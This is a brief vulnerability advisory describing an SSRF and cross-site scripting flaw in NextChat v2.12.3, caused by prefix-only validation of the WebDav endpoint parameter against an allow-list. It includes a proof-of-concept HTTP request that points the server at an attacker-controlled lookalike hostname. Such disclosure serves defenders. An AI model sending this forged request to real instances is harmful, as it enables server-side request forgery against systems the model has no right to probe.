NextChat Server-Side Request Forgery / Cross-Site Scripting

NextChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the GET parameter on the WebDav API endpoint.

The vulnerability exists because of the following code snippet : 

// Validate the endpoint to prevent potential SSRF attacks
  if (
    !mergedAllowedWebDavEndpoints.some(
      (allowedEndpoint) => endpoint?.startsWith(allowedEndpoint),
    )
  )

This check seems incomplete because it validates if the URL specified in the endpoint GET parameter starts with the URL declared in the following file :

export const internalAllowedWebDavEndpoints = [
  "https://dav.jianguoyun.com/dav/",
  "https://dav.dropdav.com/",
  "https://dav.box.com/dav",
  "https://nanao.teracloud.jp/dav/",
  "https://bora.teracloud.jp/dav/",
  "https://webdav.4shared.com/",
  "https://dav.idrivesync.com",
  "https://webdav.yandex.com",
  "https://app.koofr.net/dav/Koofr",
];

Some allowed URLs do not enforce the trailing slash or a specific folder, allowing an attacker to forge a valid URL which can then pass through the SSRF verification and trigger an arbitrary HTTPS call from the vulnerable instance.

Proof Of Concept:

In order to reproduce the issue, it is possible to create an attacker-controller hostname like webdav.yandex.com.attacker.tld and perform the following HTTP request : 

GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.attacker.tld/ HTTP/1.1
Host: VULNERABLE_NEXTCHAT_INSTANCE
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close

The vulnerable instance will then issue a HTTPS request to https://webdav.yandex.com.attacker.tld.